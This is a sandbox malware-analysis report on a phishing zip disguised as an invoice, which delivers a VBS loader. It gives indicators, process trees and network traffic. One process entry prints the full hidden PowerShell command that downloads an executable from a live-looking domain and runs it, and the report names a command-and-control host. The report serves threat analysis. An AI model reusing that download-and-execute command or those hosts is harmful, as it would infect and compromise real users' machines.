File name:

SignIQ Pty Ltd invoice 127.zip

Full analysis: https://app.any.run/tasks/b304f663-902a-4dfc-8b1b-de104af5bb5d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 15, 2019, 08:44:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

1237AE60F76B5AECB8EB9FC55A858002

SHA1:

3CE266BAA2E645E85B01EB3CEDE10FFC4C15BE84

SHA256:

024B3CB1633DE1603168D69AF457AB313B56F9D609DF46BED4389A74D243E907

SSDEEP:

384:hryL7K2HYhSO4zre7SGTx7pv1MENKWfr+Lk3X8lfQc0yKj+pKZkJva:4L7bHYwO4wQq3TFlc+C0ZkY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • dVjiJafHlc.exe (PID: 1628)

    • Changes settings of System certificates

      • dVjiJafHlc.exe (PID: 1628)

  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • WinRAR.exe (PID: 2856)
      • WScript.exe (PID: 2384)
      • powershell.exe (PID: 2592)

    • Creates files in the user directory

      • powershell.exe (PID: 2592)

    • Executes PowerShell scripts

      • WScript.exe (PID: 2384)

  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2136)
      • iexplore.exe (PID: 2728)
      • iexplore.exe (PID: 908)
      • iexplore.exe (PID: 2488)
      • iexplore.exe (PID: 652)

    • Changes internet zones settings

      • iexplore.exe (PID: 2136)
      • iexplore.exe (PID: 2728)
      • iexplore.exe (PID: 908)
      • iexplore.exe (PID: 2488)
      • iexplore.exe (PID: 652)

    • Reads the machine GUID from the registry

      • iexplore.exe (PID: 2136)
      • iexplore.exe (PID: 2728)
      • iexplore.exe (PID: 652)
      • iexplore.exe (PID: 2488)
      • iexplore.exe (PID: 908)

    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 2912)
      • IEXPLORE.EXE (PID: 2800)
      • IEXPLORE.EXE (PID: 1892)
      • IEXPLORE.EXE (PID: 2752)
      • IEXPLORE.EXE (PID: 1904)

    • Reads settings of System Certificates

      • iexplore.exe (PID: 2136)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2019:04:15 00:29:05
ZipCRC: 0x98232722
ZipCompressedSize: 18326
ZipUncompressedSize: 69345
ZipFileName: SignIQ Pty Ltd invoice 127.vbs
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
14
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs powershell.exe no specs dvjijafhlc.exe iexplore.exe iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
652"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
908"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
1628"C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe" C:\Users\admin\AppData\Local\Temp\dVjiJafHlc.exe
powershell.exe
User:
admin
Company:
INCA Internet Co., Ltd.
Integrity Level:
MEDIUM
Description:
nProtect KeyCrypt Program Database DLL
Exit code:
0
Version:
2003, 10, 1, 1
Modules
Images
c:\users\admin\appdata\local\temp\dvjijafhlc.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1892"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2488 CREDAT:267521 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1904"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:652 CREDAT:267521 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2136"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2384"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\SignIQ Pty Ltd invoice 127.vbs" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2488"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2592"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -exec bypass -nop if($host.version.major -lt 3){Import-Module BitsTransfer} Start-BitsTransfer -Source https://saintsandsinnersbar.com/duplicate/answear.xls -Destination $env:temp\dVjiJafHlc.exe; Start-Process $env:temp\dVjiJafHlc.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2728"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
Total events
2 933
Read events
2 612
Write events
315
Delete events
6

Modification events

(PID) Process:(2856) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2856) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(2856) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2856) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\SignIQ Pty Ltd invoice 127.zip
(PID) Process:(2856) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2856) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2856) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2856) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2856) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
Operation:writeName:@C:\Windows\System32\wshext.dll,-4802
Value:
VBScript Script File
(PID) Process:(2856) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF1600000016000000D60300000B020000
Executable files
0
Suspicious files
5
Text files
42
Unknown types
0

Dropped files

PID
Process
Filename
Type
2856WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa2856.37052\SignIQ Pty Ltd invoice 127.vbs
MD5:
SHA256:
2592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7MWNSL020TRSPYEJ33VD.temp
MD5:
SHA256:
2136iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF2A434C7F99621D9E.TMP
MD5:
SHA256:
2136iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF80DE6EF062B4C06B.TMP
MD5:
SHA256:
2136iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{B81E0021-5F5A-11E9-8447-5254004AAD21}.dat
MD5:
SHA256:
2136iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\iecompatviewlist[1].xmlxml
MD5:
SHA256:
2912IEXPLORE.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YQPEPCE1\errorPageStrings[1]text
MD5:6B26ECFA58E37D4B5EC861FCDD3F04FA
SHA256:7F7D1069CA8A852C1C8EB36E1D988FE6A9C17ECB8EFF1F66FC5EBFEB5418723A
2592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:
SHA256:
2728iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF6903DA4F78FDD3B0.TMP
MD5:
SHA256:
2136iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{B81E0023-5F5A-11E9-8447-5254004AAD21}.datbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
12
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
200
94.23.14.191:443
https://saintsandsinnersbar.com/duplicate/answear.xls
FR
unknown
2136
iexplore.exe
GET
304
152.199.19.161:443
https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlistWin7.xml
US
whitelisted
2136
iexplore.exe
GET
200
152.199.19.161:443
https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblocklist.bin
US
whitelisted
GET
200
94.23.14.191:443
https://saintsandsinnersbar.com/duplicate/answear.xls
FR
executable
406 Kb
unknown
2800
IEXPLORE.EXE
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
2752
IEXPLORE.EXE
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
1628
dVjiJafHlc.exe
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
1628
dVjiJafHlc.exe
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
1904
IEXPLORE.EXE
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
1892
IEXPLORE.EXE
POST
404
46.17.45.108:443
https://itschoolegz.com/index.htm
RU
html
169 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1628
dVjiJafHlc.exe
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
2800
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
2136
iexplore.exe
152.199.19.161:443
r20swj13mr.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1892
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
2752
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
94.23.14.191:443
saintsandsinnersbar.com
OVH SAS
FR
unknown
2912
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious
1904
IEXPLORE.EXE
46.17.45.108:443
itschoolegz.com
LLC Baxet
RU
malicious

DNS requests

Domain
IP
Reputation
teredo.ipv6.microsoft.com
whitelisted
saintsandsinnersbar.com
  • 94.23.14.191
unknown
itschoolegz.com
  • 46.17.45.108
malicious
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
SignIQ Pty Ltd invoice 127.zip